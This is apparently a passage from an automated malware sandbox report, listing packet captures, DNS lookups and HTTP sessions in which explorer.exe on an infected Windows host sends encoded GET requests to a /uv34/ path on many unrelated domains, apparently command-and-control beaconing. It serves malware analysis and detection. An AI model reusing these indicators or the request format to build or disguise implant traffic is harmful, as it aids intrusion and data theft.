                                                                            May 12, 2021 08:41:48.184983015 CEST8049731199.192.23.253192.168.2.6
                                                                            May 12, 2021 08:41:48.185359955 CEST4973180192.168.2.6199.192.23.253
                                                                            May 12, 2021 08:41:48.185560942 CEST4973180192.168.2.6199.192.23.253
                                                                            May 12, 2021 08:41:48.381515026 CEST8049731199.192.23.253192.168.2.6
                                                                            May 12, 2021 08:41:48.454969883 CEST8049731199.192.23.253192.168.2.6
                                                                            May 12, 2021 08:41:48.454998970 CEST8049731199.192.23.253192.168.2.6
                                                                            May 12, 2021 08:41:48.455245972 CEST4973180192.168.2.6199.192.23.253
                                                                            May 12, 2021 08:41:48.455327988 CEST4973180192.168.2.6199.192.23.253
                                                                            May 12, 2021 08:41:48.650408030 CEST8049731199.192.23.253192.168.2.6
                                                                            May 12, 2021 08:41:53.533854961 CEST4973480192.168.2.664.190.62.111
                                                                            May 12, 2021 08:41:53.579214096 CEST804973464.190.62.111192.168.2.6
                                                                            May 12, 2021 08:41:53.579309940 CEST4973480192.168.2.664.190.62.111
                                                                            May 12, 2021 08:41:53.579425097 CEST4973480192.168.2.664.190.62.111
                                                                            May 12, 2021 08:41:53.624849081 CEST804973464.190.62.111192.168.2.6
                                                                            May 12, 2021 08:41:53.655127048 CEST804973464.190.62.111192.168.2.6
                                                                            May 12, 2021 08:41:53.655168056 CEST804973464.190.62.111192.168.2.6
                                                                            May 12, 2021 08:41:53.655359983 CEST4973480192.168.2.664.190.62.111
                                                                            May 12, 2021 08:41:53.655395031 CEST4973480192.168.2.664.190.62.111
                                                                            May 12, 2021 08:41:53.702003002 CEST804973464.190.62.111192.168.2.6
                                                                            May 12, 2021 08:41:58.728107929 CEST4973780192.168.2.634.102.136.180
                                                                            May 12, 2021 08:41:58.769252062 CEST804973734.102.136.180192.168.2.6
                                                                            May 12, 2021 08:41:58.769377947 CEST4973780192.168.2.634.102.136.180
                                                                            May 12, 2021 08:41:58.769610882 CEST4973780192.168.2.634.102.136.180
                                                                            May 12, 2021 08:41:58.810611963 CEST804973734.102.136.180192.168.2.6
                                                                            May 12, 2021 08:41:58.906670094 CEST804973734.102.136.180192.168.2.6
                                                                            May 12, 2021 08:41:58.906706095 CEST804973734.102.136.180192.168.2.6
                                                                            May 12, 2021 08:41:58.906847954 CEST4973780192.168.2.634.102.136.180
                                                                            May 12, 2021 08:41:58.906909943 CEST4973780192.168.2.634.102.136.180
                                                                            May 12, 2021 08:41:58.948246956 CEST804973734.102.136.180192.168.2.6
                                                                            May 12, 2021 08:42:04.038467884 CEST4973880192.168.2.6172.217.168.83
                                                                            May 12, 2021 08:42:04.093427896 CEST8049738172.217.168.83192.168.2.6
                                                                            May 12, 2021 08:42:04.093615055 CEST4973880192.168.2.6172.217.168.83
                                                                            May 12, 2021 08:42:04.093743086 CEST4973880192.168.2.6172.217.168.83
                                                                            May 12, 2021 08:42:04.147674084 CEST8049738172.217.168.83192.168.2.6
                                                                            May 12, 2021 08:42:04.168349028 CEST8049738172.217.168.83192.168.2.6
                                                                            May 12, 2021 08:42:04.168392897 CEST8049738172.217.168.83192.168.2.6
                                                                            May 12, 2021 08:42:04.168421030 CEST8049738172.217.168.83192.168.2.6
                                                                            May 12, 2021 08:42:04.168565989 CEST4973880192.168.2.6172.217.168.83
                                                                            May 12, 2021 08:42:04.168693066 CEST4973880192.168.2.6172.217.168.83
                                                                            May 12, 2021 08:42:04.223028898 CEST8049738172.217.168.83192.168.2.6
                                                                            May 12, 2021 08:42:09.251142025 CEST4973980192.168.2.634.102.136.180
                                                                            May 12, 2021 08:42:09.292185068 CEST804973934.102.136.180192.168.2.6
                                                                            May 12, 2021 08:42:09.292366028 CEST4973980192.168.2.634.102.136.180
                                                                            May 12, 2021 08:42:09.292547941 CEST4973980192.168.2.634.102.136.180
                                                                            May 12, 2021 08:42:09.333488941 CEST804973934.102.136.180192.168.2.6
                                                                            May 12, 2021 08:42:09.429548025 CEST804973934.102.136.180192.168.2.6
                                                                            May 12, 2021 08:42:09.429599047 CEST804973934.102.136.180192.168.2.6
                                                                            May 12, 2021 08:42:09.429847002 CEST4973980192.168.2.634.102.136.180
                                                                            May 12, 2021 08:42:09.429889917 CEST4973980192.168.2.634.102.136.180
                                                                            May 12, 2021 08:42:09.471201897 CEST804973934.102.136.180192.168.2.6
                                                                            May 12, 2021 08:42:14.688649893 CEST4974080192.168.2.645.39.20.158
                                                                            May 12, 2021 08:42:14.893313885 CEST804974045.39.20.158192.168.2.6
                                                                            May 12, 2021 08:42:14.893541098 CEST4974080192.168.2.645.39.20.158
                                                                            May 12, 2021 08:42:14.893963099 CEST4974080192.168.2.645.39.20.158
                                                                            May 12, 2021 08:42:15.098444939 CEST804974045.39.20.158192.168.2.6
                                                                            May 12, 2021 08:42:15.098475933 CEST804974045.39.20.158192.168.2.6
                                                                            May 12, 2021 08:42:15.098488092 CEST804974045.39.20.158192.168.2.6
                                                                            May 12, 2021 08:42:15.098676920 CEST4974080192.168.2.645.39.20.158
                                                                            May 12, 2021 08:42:15.098736048 CEST4974080192.168.2.645.39.20.158
                                                                            May 12, 2021 08:42:15.306457043 CEST804974045.39.20.158192.168.2.6
                                                                            May 12, 2021 08:42:20.359623909 CEST4974480192.168.2.6173.236.152.151
                                                                            May 12, 2021 08:42:20.499883890 CEST8049744173.236.152.151192.168.2.6
                                                                            May 12, 2021 08:42:20.500035048 CEST4974480192.168.2.6173.236.152.151
                                                                            May 12, 2021 08:42:20.500356913 CEST4974480192.168.2.6173.236.152.151
                                                                            May 12, 2021 08:42:20.640467882 CEST8049744173.236.152.151192.168.2.6
                                                                            May 12, 2021 08:42:20.640997887 CEST8049744173.236.152.151192.168.2.6
                                                                            May 12, 2021 08:42:20.641031981 CEST8049744173.236.152.151192.168.2.6
                                                                            May 12, 2021 08:42:20.641415119 CEST4974480192.168.2.6173.236.152.151
                                                                            May 12, 2021 08:42:20.641587973 CEST4974480192.168.2.6173.236.152.151
                                                                            May 12, 2021 08:42:20.781630993 CEST8049744173.236.152.151192.168.2.6
                                                                            May 12, 2021 08:42:25.719095945 CEST4974580192.168.2.6160.153.132.205
                                                                            May 12, 2021 08:42:25.770159006 CEST8049745160.153.132.205192.168.2.6
                                                                            May 12, 2021 08:42:25.770363092 CEST4974580192.168.2.6160.153.132.205
                                                                            May 12, 2021 08:42:25.770747900 CEST4974580192.168.2.6160.153.132.205
                                                                            May 12, 2021 08:42:25.821537018 CEST8049745160.153.132.205192.168.2.6
                                                                            May 12, 2021 08:42:25.841358900 CEST8049745160.153.132.205192.168.2.6
                                                                            May 12, 2021 08:42:25.841398954 CEST8049745160.153.132.205192.168.2.6
                                                                            May 12, 2021 08:42:25.841413975 CEST8049745160.153.132.205192.168.2.6
                                                                            May 12, 2021 08:42:25.841631889 CEST4974580192.168.2.6160.153.132.205
                                                                            May 12, 2021 08:42:25.841754913 CEST4974580192.168.2.6160.153.132.205
                                                                            May 12, 2021 08:42:25.892359972 CEST8049745160.153.132.205192.168.2.6
                                                                            May 12, 2021 08:42:41.156760931 CEST4974880192.168.2.634.102.136.180
                                                                            May 12, 2021 08:42:41.199326038 CEST804974834.102.136.180192.168.2.6
                                                                            May 12, 2021 08:42:41.199471951 CEST4974880192.168.2.634.102.136.180
                                                                            May 12, 2021 08:42:41.199654102 CEST4974880192.168.2.634.102.136.180
                                                                            May 12, 2021 08:42:41.240564108 CEST804974834.102.136.180192.168.2.6
                                                                            May 12, 2021 08:42:41.336272955 CEST804974834.102.136.180192.168.2.6
                                                                            May 12, 2021 08:42:41.336301088 CEST804974834.102.136.180192.168.2.6
                                                                            May 12, 2021 08:42:41.336494923 CEST4974880192.168.2.634.102.136.180
                                                                            May 12, 2021 08:42:41.336566925 CEST4974880192.168.2.634.102.136.180
                                                                            May 12, 2021 08:42:41.378762960 CEST804974834.102.136.180192.168.2.6
                                                                            May 12, 2021 08:42:51.795253038 CEST4974980192.168.2.6198.54.117.217
                                                                            May 12, 2021 08:42:51.992503881 CEST8049749198.54.117.217192.168.2.6
                                                                            May 12, 2021 08:42:51.992718935 CEST4974980192.168.2.6198.54.117.217
                                                                            May 12, 2021 08:42:51.992958069 CEST4974980192.168.2.6198.54.117.217
                                                                            May 12, 2021 08:42:52.190454960 CEST8049749198.54.117.217192.168.2.6
                                                                            May 12, 2021 08:42:52.190479994 CEST8049749198.54.117.217192.168.2.6

                                                                            UDP Packets

                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                            May 12, 2021 08:40:39.068361998 CEST4928353192.168.2.68.8.8.8
                                                                            May 12, 2021 08:40:39.114054918 CEST5837753192.168.2.68.8.8.8
                                                                            May 12, 2021 08:40:39.128588915 CEST53492838.8.8.8192.168.2.6
                                                                            May 12, 2021 08:40:39.179604053 CEST53583778.8.8.8192.168.2.6
                                                                            May 12, 2021 08:40:40.683062077 CEST5507453192.168.2.68.8.8.8
                                                                            May 12, 2021 08:40:40.731836081 CEST53550748.8.8.8192.168.2.6
                                                                            May 12, 2021 08:40:41.577227116 CEST5451353192.168.2.68.8.8.8
                                                                            May 12, 2021 08:40:41.628846884 CEST53545138.8.8.8192.168.2.6
                                                                            May 12, 2021 08:40:42.107254982 CEST6204453192.168.2.68.8.8.8
                                                                            May 12, 2021 08:40:42.168605089 CEST53620448.8.8.8192.168.2.6
                                                                            May 12, 2021 08:40:42.924268961 CEST6379153192.168.2.68.8.8.8
                                                                            May 12, 2021 08:40:42.975831985 CEST53637918.8.8.8192.168.2.6
                                                                            May 12, 2021 08:40:44.282483101 CEST6426753192.168.2.68.8.8.8
                                                                            May 12, 2021 08:40:44.334367037 CEST53642678.8.8.8192.168.2.6
                                                                            May 12, 2021 08:40:46.312216997 CEST4944853192.168.2.68.8.8.8
                                                                            May 12, 2021 08:40:46.361088037 CEST53494488.8.8.8192.168.2.6
                                                                            May 12, 2021 08:40:47.150537014 CEST6034253192.168.2.68.8.8.8
                                                                            May 12, 2021 08:40:47.199246883 CEST53603428.8.8.8192.168.2.6
                                                                            May 12, 2021 08:40:47.988475084 CEST6134653192.168.2.68.8.8.8
                                                                            May 12, 2021 08:40:48.037570953 CEST53613468.8.8.8192.168.2.6
                                                                            May 12, 2021 08:40:49.129786015 CEST5177453192.168.2.68.8.8.8
                                                                            May 12, 2021 08:40:49.178658962 CEST53517748.8.8.8192.168.2.6
                                                                            May 12, 2021 08:40:50.392833948 CEST5602353192.168.2.68.8.8.8
                                                                            May 12, 2021 08:40:50.445292950 CEST53560238.8.8.8192.168.2.6
                                                                            May 12, 2021 08:40:51.367477894 CEST5838453192.168.2.68.8.8.8
                                                                            May 12, 2021 08:40:51.417063951 CEST53583848.8.8.8192.168.2.6
                                                                            May 12, 2021 08:40:52.251118898 CEST6026153192.168.2.68.8.8.8
                                                                            May 12, 2021 08:40:52.308456898 CEST53602618.8.8.8192.168.2.6
                                                                            May 12, 2021 08:40:54.054757118 CEST5606153192.168.2.68.8.8.8
                                                                            May 12, 2021 08:40:54.115659952 CEST53560618.8.8.8192.168.2.6
                                                                            May 12, 2021 08:40:55.203450918 CEST5833653192.168.2.68.8.8.8
                                                                            May 12, 2021 08:40:55.252172947 CEST53583368.8.8.8192.168.2.6
                                                                            May 12, 2021 08:40:56.035790920 CEST5378153192.168.2.68.8.8.8
                                                                            May 12, 2021 08:40:56.084594965 CEST53537818.8.8.8192.168.2.6
                                                                            May 12, 2021 08:40:57.144754887 CEST5406453192.168.2.68.8.8.8
                                                                            May 12, 2021 08:40:57.196247101 CEST53540648.8.8.8192.168.2.6
                                                                            May 12, 2021 08:40:57.969147921 CEST5281153192.168.2.68.8.8.8
                                                                            May 12, 2021 08:40:58.017726898 CEST53528118.8.8.8192.168.2.6
                                                                            May 12, 2021 08:40:58.856585026 CEST5529953192.168.2.68.8.8.8
                                                                            May 12, 2021 08:40:58.905508995 CEST53552998.8.8.8192.168.2.6
                                                                            May 12, 2021 08:41:17.154485941 CEST6374553192.168.2.68.8.8.8
                                                                            May 12, 2021 08:41:17.225435972 CEST53637458.8.8.8192.168.2.6
                                                                            May 12, 2021 08:41:23.844883919 CEST5005553192.168.2.68.8.8.8
                                                                            May 12, 2021 08:41:23.920362949 CEST53500558.8.8.8192.168.2.6
                                                                            May 12, 2021 08:41:34.483180046 CEST6137453192.168.2.68.8.8.8
                                                                            May 12, 2021 08:41:34.548908949 CEST53613748.8.8.8192.168.2.6
                                                                            May 12, 2021 08:41:41.866447926 CEST5033953192.168.2.68.8.8.8
                                                                            May 12, 2021 08:41:42.026329041 CEST53503398.8.8.8192.168.2.6
                                                                            May 12, 2021 08:41:43.031661987 CEST6330753192.168.2.68.8.8.8
                                                                            May 12, 2021 08:41:43.169805050 CEST53633078.8.8.8192.168.2.6
                                                                            May 12, 2021 08:41:43.723687887 CEST4969453192.168.2.68.8.8.8
                                                                            May 12, 2021 08:41:43.780988932 CEST53496948.8.8.8192.168.2.6
                                                                            May 12, 2021 08:41:44.208921909 CEST5498253192.168.2.68.8.8.8
                                                                            May 12, 2021 08:41:44.364655972 CEST53549828.8.8.8192.168.2.6
                                                                            May 12, 2021 08:41:44.894913912 CEST5001053192.168.2.68.8.8.8
                                                                            May 12, 2021 08:41:44.965607882 CEST53500108.8.8.8192.168.2.6
                                                                            May 12, 2021 08:41:44.971998930 CEST6371853192.168.2.68.8.8.8
                                                                            May 12, 2021 08:41:45.024848938 CEST53637188.8.8.8192.168.2.6
                                                                            May 12, 2021 08:41:45.619128942 CEST6211653192.168.2.68.8.8.8
                                                                            May 12, 2021 08:41:45.679409027 CEST53621168.8.8.8192.168.2.6
                                                                            May 12, 2021 08:41:46.161278963 CEST6381653192.168.2.68.8.8.8
                                                                            May 12, 2021 08:41:46.210536003 CEST53638168.8.8.8192.168.2.6
                                                                            May 12, 2021 08:41:47.076004028 CEST5501453192.168.2.68.8.8.8
                                                                            May 12, 2021 08:41:47.141442060 CEST53550148.8.8.8192.168.2.6
                                                                            May 12, 2021 08:41:47.924146891 CEST6220853192.168.2.68.8.8.8
                                                                            May 12, 2021 08:41:47.982878923 CEST53622088.8.8.8192.168.2.6
                                                                            May 12, 2021 08:41:48.178400040 CEST5757453192.168.2.68.8.8.8
                                                                            May 12, 2021 08:41:48.239283085 CEST53575748.8.8.8192.168.2.6
                                                                            May 12, 2021 08:41:48.691677094 CEST5181853192.168.2.68.8.8.8
                                                                            May 12, 2021 08:41:48.748836994 CEST53518188.8.8.8192.168.2.6
                                                                            May 12, 2021 08:41:53.464710951 CEST5662853192.168.2.68.8.8.8
                                                                            May 12, 2021 08:41:53.532840967 CEST53566288.8.8.8192.168.2.6
                                                                            May 12, 2021 08:41:55.650001049 CEST6077853192.168.2.68.8.8.8
                                                                            May 12, 2021 08:41:55.711256981 CEST53607788.8.8.8192.168.2.6
                                                                            May 12, 2021 08:41:58.666215897 CEST5379953192.168.2.68.8.8.8
                                                                            May 12, 2021 08:41:58.726906061 CEST53537998.8.8.8192.168.2.6
                                                                            May 12, 2021 08:42:03.935830116 CEST5468353192.168.2.68.8.8.8
                                                                            May 12, 2021 08:42:04.036597967 CEST53546838.8.8.8192.168.2.6
                                                                            May 12, 2021 08:42:09.184465885 CEST5932953192.168.2.68.8.8.8
                                                                            May 12, 2021 08:42:09.249818087 CEST53593298.8.8.8192.168.2.6
                                                                            May 12, 2021 08:42:14.469540119 CEST6402153192.168.2.68.8.8.8
                                                                            May 12, 2021 08:42:14.686325073 CEST53640218.8.8.8192.168.2.6
                                                                            May 12, 2021 08:42:18.616276026 CEST5612953192.168.2.68.8.8.8
                                                                            May 12, 2021 08:42:18.692198992 CEST53561298.8.8.8192.168.2.6
                                                                            May 12, 2021 08:42:20.132292986 CEST5817753192.168.2.68.8.8.8
                                                                            May 12, 2021 08:42:20.357342958 CEST53581778.8.8.8192.168.2.6
                                                                            May 12, 2021 08:42:25.655632019 CEST5070053192.168.2.68.8.8.8
                                                                            May 12, 2021 08:42:25.717556953 CEST53507008.8.8.8192.168.2.6
                                                                            May 12, 2021 08:42:28.659461975 CEST5406953192.168.2.68.8.8.8
                                                                            May 12, 2021 08:42:28.725168943 CEST53540698.8.8.8192.168.2.6
                                                                            May 12, 2021 08:42:30.194370985 CEST6117853192.168.2.68.8.8.8
                                                                            May 12, 2021 08:42:30.268462896 CEST53611788.8.8.8192.168.2.6
                                                                            May 12, 2021 08:42:30.864399910 CEST5701753192.168.2.68.8.8.8
                                                                            May 12, 2021 08:42:30.925359011 CEST53570178.8.8.8192.168.2.6
                                                                            May 12, 2021 08:42:35.979862928 CEST5632753192.168.2.68.8.8.8
                                                                            May 12, 2021 08:42:36.062607050 CEST53563278.8.8.8192.168.2.6
                                                                            May 12, 2021 08:42:41.084408045 CEST5024353192.168.2.68.8.8.8
                                                                            May 12, 2021 08:42:41.155487061 CEST53502438.8.8.8192.168.2.6
                                                                            May 12, 2021 08:42:46.347724915 CEST6205553192.168.2.68.8.8.8
                                                                            May 12, 2021 08:42:46.695276022 CEST53620558.8.8.8192.168.2.6
                                                                            May 12, 2021 08:42:51.731790066 CEST6124953192.168.2.68.8.8.8
                                                                            May 12, 2021 08:42:51.793900967 CEST53612498.8.8.8192.168.2.6
                                                                            May 12, 2021 08:42:57.204747915 CEST6525253192.168.2.68.8.8.8
                                                                            May 12, 2021 08:42:57.513603926 CEST53652528.8.8.8192.168.2.6

                                                                            DNS Queries

                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                            May 12, 2021 08:41:47.924146891 CEST192.168.2.68.8.8.80xb15Standard query (0)www.contorig2.comA (IP address)IN (0x0001)
                                                                            May 12, 2021 08:41:53.464710951 CEST192.168.2.68.8.8.80x7f6dStandard query (0)www.muldentaxi.comA (IP address)IN (0x0001)
                                                                            May 12, 2021 08:41:58.666215897 CEST192.168.2.68.8.8.80x94d9Standard query (0)www.gofourd.comA (IP address)IN (0x0001)
                                                                            May 12, 2021 08:42:03.935830116 CEST192.168.2.68.8.8.80xeeb7Standard query (0)www.ihdeuruim.comA (IP address)IN (0x0001)
                                                                            May 12, 2021 08:42:09.184465885 CEST192.168.2.68.8.8.80xc56Standard query (0)www.embraceblm.comA (IP address)IN (0x0001)
                                                                            May 12, 2021 08:42:14.469540119 CEST192.168.2.68.8.8.80x26eeStandard query (0)www.ytksw.comA (IP address)IN (0x0001)
                                                                            May 12, 2021 08:42:20.132292986 CEST192.168.2.68.8.8.80xfde1Standard query (0)www.buraktradingltd.comA (IP address)IN (0x0001)
                                                                            May 12, 2021 08:42:25.655632019 CEST192.168.2.68.8.8.80x60adStandard query (0)www.bogolacke.comA (IP address)IN (0x0001)
                                                                            May 12, 2021 08:42:30.864399910 CEST192.168.2.68.8.8.80xbd0cStandard query (0)www.soccer-yokouchi.clubA (IP address)IN (0x0001)
                                                                            May 12, 2021 08:42:35.979862928 CEST192.168.2.68.8.8.80x73fbStandard query (0)www.maraitime.comA (IP address)IN (0x0001)
                                                                            May 12, 2021 08:42:41.084408045 CEST192.168.2.68.8.8.80x9478Standard query (0)www.albanyhumanesociety.netA (IP address)IN (0x0001)
                                                                            May 12, 2021 08:42:46.347724915 CEST192.168.2.68.8.8.80x9b22Standard query (0)www.helenafinaltouch.comA (IP address)IN (0x0001)
                                                                            May 12, 2021 08:42:51.731790066 CEST192.168.2.68.8.8.80x1090Standard query (0)www.sandybottomsflipflops.comA (IP address)IN (0x0001)
                                                                            May 12, 2021 08:42:57.204747915 CEST192.168.2.68.8.8.80x59d2Standard query (0)www.hysjs168.comA (IP address)IN (0x0001)

                                                                            DNS Answers

                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                            May 12, 2021 08:41:47.982878923 CEST8.8.8.8192.168.2.60xb15No error (0)www.contorig2.com199.192.23.253A (IP address)IN (0x0001)
                                                                            May 12, 2021 08:41:53.532840967 CEST8.8.8.8192.168.2.60x7f6dNo error (0)www.muldentaxi.com64.190.62.111A (IP address)IN (0x0001)
                                                                            May 12, 2021 08:41:58.726906061 CEST8.8.8.8192.168.2.60x94d9No error (0)www.gofourd.comgofourd.comCNAME (Canonical name)IN (0x0001)
                                                                            May 12, 2021 08:41:58.726906061 CEST8.8.8.8192.168.2.60x94d9No error (0)gofourd.com34.102.136.180A (IP address)IN (0x0001)
                                                                            May 12, 2021 08:42:04.036597967 CEST8.8.8.8192.168.2.60xeeb7No error (0)www.ihdeuruim.comwww.ihdeuruim.com.ghs.googlehosted.comCNAME (Canonical name)IN (0x0001)
                                                                            May 12, 2021 08:42:04.036597967 CEST8.8.8.8192.168.2.60xeeb7No error (0)www.ihdeuruim.com.ghs.googlehosted.comghs.googlehosted.comCNAME (Canonical name)IN (0x0001)
                                                                            May 12, 2021 08:42:04.036597967 CEST8.8.8.8192.168.2.60xeeb7No error (0)ghs.googlehosted.com172.217.168.83A (IP address)IN (0x0001)
                                                                            May 12, 2021 08:42:09.249818087 CEST8.8.8.8192.168.2.60xc56No error (0)www.embraceblm.comembraceblm.comCNAME (Canonical name)IN (0x0001)
                                                                            May 12, 2021 08:42:09.249818087 CEST8.8.8.8192.168.2.60xc56No error (0)embraceblm.com34.102.136.180A (IP address)IN (0x0001)
                                                                            May 12, 2021 08:42:14.686325073 CEST8.8.8.8192.168.2.60x26eeNo error (0)www.ytksw.com45.39.20.158A (IP address)IN (0x0001)
                                                                            May 12, 2021 08:42:20.357342958 CEST8.8.8.8192.168.2.60xfde1No error (0)www.buraktradingltd.com173.236.152.151A (IP address)IN (0x0001)
                                                                            May 12, 2021 08:42:25.717556953 CEST8.8.8.8192.168.2.60x60adNo error (0)www.bogolacke.combogolacke.comCNAME (Canonical name)IN (0x0001)
                                                                            May 12, 2021 08:42:25.717556953 CEST8.8.8.8192.168.2.60x60adNo error (0)bogolacke.com160.153.132.205A (IP address)IN (0x0001)
                                                                            May 12, 2021 08:42:30.925359011 CEST8.8.8.8192.168.2.60xbd0cName error (3)www.soccer-yokouchi.clubnonenoneA (IP address)IN (0x0001)
                                                                            May 12, 2021 08:42:36.062607050 CEST8.8.8.8192.168.2.60x73fbName error (3)www.maraitime.comnonenoneA (IP address)IN (0x0001)
                                                                            May 12, 2021 08:42:41.155487061 CEST8.8.8.8192.168.2.60x9478No error (0)www.albanyhumanesociety.netalbanyhumanesociety.netCNAME (Canonical name)IN (0x0001)
                                                                            May 12, 2021 08:42:41.155487061 CEST8.8.8.8192.168.2.60x9478No error (0)albanyhumanesociety.net34.102.136.180A (IP address)IN (0x0001)
                                                                            May 12, 2021 08:42:51.793900967 CEST8.8.8.8192.168.2.60x1090No error (0)www.sandybottomsflipflops.comparkingpage.namecheap.comCNAME (Canonical name)IN (0x0001)
                                                                            May 12, 2021 08:42:51.793900967 CEST8.8.8.8192.168.2.60x1090No error (0)parkingpage.namecheap.com198.54.117.217A (IP address)IN (0x0001)
                                                                            May 12, 2021 08:42:51.793900967 CEST8.8.8.8192.168.2.60x1090No error (0)parkingpage.namecheap.com198.54.117.215A (IP address)IN (0x0001)
                                                                            May 12, 2021 08:42:51.793900967 CEST8.8.8.8192.168.2.60x1090No error (0)parkingpage.namecheap.com198.54.117.218A (IP address)IN (0x0001)
                                                                            May 12, 2021 08:42:51.793900967 CEST8.8.8.8192.168.2.60x1090No error (0)parkingpage.namecheap.com198.54.117.210A (IP address)IN (0x0001)
                                                                            May 12, 2021 08:42:51.793900967 CEST8.8.8.8192.168.2.60x1090No error (0)parkingpage.namecheap.com198.54.117.216A (IP address)IN (0x0001)
                                                                            May 12, 2021 08:42:51.793900967 CEST8.8.8.8192.168.2.60x1090No error (0)parkingpage.namecheap.com198.54.117.211A (IP address)IN (0x0001)
                                                                            May 12, 2021 08:42:51.793900967 CEST8.8.8.8192.168.2.60x1090No error (0)parkingpage.namecheap.com198.54.117.212A (IP address)IN (0x0001)
                                                                            May 12, 2021 08:42:57.513603926 CEST8.8.8.8192.168.2.60x59d2No error (0)www.hysjs168.com182.61.46.180A (IP address)IN (0x0001)

                                                                            HTTP Request Dependency Graph

                                                                            • www.contorig2.com
                                                                            • www.muldentaxi.com
                                                                            • www.gofourd.com
                                                                            • www.ihdeuruim.com
                                                                            • www.embraceblm.com
                                                                            • www.ytksw.com
                                                                            • www.buraktradingltd.com
                                                                            • www.bogolacke.com
                                                                            • www.albanyhumanesociety.net
                                                                            • www.sandybottomsflipflops.com

                                                                            HTTP Packets

                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                            0192.168.2.649731199.192.23.25380C:\Windows\explorer.exe
                                                                            TimestampkBytes transferredDirectionData
                                                                            May 12, 2021 08:41:48.185560942 CEST2172OUTGET /uv34/?_JB=SL3d2L8&D0Dhj=PNkuYexmaEbpw3EaQG1gqEXEhReu9m0wSncWUc9u1VG5H+XH3gAiJ6++bzNk4ZSFpS3p79DaPA== HTTP/1.1
                                                                            Host: www.contorig2.com
                                                                            Connection: close
                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                            Data Ascii:
                                                                            May 12, 2021 08:41:48.454969883 CEST2180INHTTP/1.1 404 Not Found
                                                                            Date: Wed, 12 May 2021 06:41:48 GMT
                                                                            Server: Apache/2.4.29 (Ubuntu)
                                                                            Content-Length: 328
                                                                            Connection: close
                                                                            Content-Type: text/html; charset=utf-8
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 75 76 33 34 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /uv34/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                            1192.168.2.64973464.190.62.11180C:\Windows\explorer.exe
                                                                            TimestampkBytes transferredDirectionData
                                                                            May 12, 2021 08:41:53.579425097 CEST2273OUTGET /uv34/?D0Dhj=I0+BvmO4ljK/nbLycIQPHPNytqxJ+McfjEJZrssF4WFDr3bjf8ExST5+Hjhrql3HpJj1V9F8nQ==&_JB=SL3d2L8 HTTP/1.1
                                                                            Host: www.muldentaxi.com
                                                                            Connection: close
                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                            Data Ascii:
                                                                            May 12, 2021 08:41:53.655127048 CEST2300INHTTP/1.1 302 Found
                                                                            date: Wed, 12 May 2021 06:41:53 GMT
                                                                            content-type: text/html; charset=UTF-8
                                                                            content-length: 0
                                                                            x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_A8DzZfUNWnmyCgQkFEETWRyarn4GoD9jEfHJZQlHNvNvxDaUboNE7XItYz4j+wmkHTlV46ISip98njl/xfs3hQ==
                                                                            expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                            cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                            pragma: no-cache
                                                                            last-modified: Wed, 12 May 2021 06:41:53 GMT
                                                                            location: https://sedo.com/search/details/?partnerid=324561&language=it&domain=muldentaxi.com&origin=sales_lander_1&utm_medium=Parking&utm_campaign=offerpage
                                                                            x-cache-miss-from: parking-5cc4cbb56f-qzncz
                                                                            server: NginX
                                                                            connection: close


                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                            2192.168.2.64973734.102.136.18080C:\Windows\explorer.exe
                                                                            TimestampkBytes transferredDirectionData
                                                                            May 12, 2021 08:41:58.769610882 CEST5591OUTGET /uv34/?_JB=SL3d2L8&D0Dhj=JPLVpJ2/QgCmFDz5d9+MEwsOtRSRnv4p4HgKpBtvwLNy+R4nAh4AcVIWdvhB9Yv67aR/bJ0jJQ== HTTP/1.1
                                                                            Host: www.gofourd.com
                                                                            Connection: close
                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                            Data Ascii:
                                                                            May 12, 2021 08:41:58.906670094 CEST6134INHTTP/1.1 403 Forbidden
                                                                            Server: openresty
                                                                            Date: Wed, 12 May 2021 06:41:58 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 275
                                                                            ETag: "60995c49-113"
                                                                            Via: 1.1 google
                                                                            Connection: close
